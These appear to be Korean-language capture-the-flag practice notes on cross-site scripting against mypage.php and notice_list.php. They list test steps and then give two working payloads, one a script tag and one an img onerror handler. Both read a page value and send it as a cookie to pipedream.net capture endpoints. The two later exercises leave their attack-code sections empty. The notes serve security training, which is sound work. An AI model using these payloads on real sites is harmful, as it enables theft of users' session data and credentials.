CTF - Basic Script Prac

mypage.php

1. 저장되고 출력되는 위치 확인
   

2. 특수문자 <’”> 사용 가능한 지 확인
   

3. <script>alert(1)</script>로 Reflected XSS 공격이 가능한 지 확인
   

4. data 탈취
   

• 공격 코드 1

  ">
  <script>
  window.addEventListener('DOMContentLoaded',
    function() {
        let e = document.querySelectorAll('input')[1].placeholder;
        let i = new Image();
        i.src = 'https://eoxee0fw4m1u2sw.m.pipedream.net/?cookie=' + e;
    });
  </script>
  

• 공격 코드 2

  ">
  <img src=. onerror="
  let e = document.querySelectorAll('input')[1].placeholder;
  let i = new Image();
  i.src = 'https://eot2jevtyijbm2l.m.pipedream.net/?cookie=' + e;
  ">
  

CTF - Steal Info

notice_list.php

1. 저장되고 출력되는 위치 확인
   

2. 특수문자 <’”> 사용 가능한 지 확인
   

3. <script>alert(1)</script>로 XSS 공격이 가능한 지 확인
   

4. data 탈취
   

• 공격 코드
  

CTF - Steal Info 2

notice_list.php

1. 저장되고 출력되는 위치 확인
   

2. 특수문자 <’”> 사용 가능한 지 확인
   

3. <script>alert(1)</script>로 Stored XSS 공격이 가능한 지 확인
   

4. data 탈취
   

• 공격 코드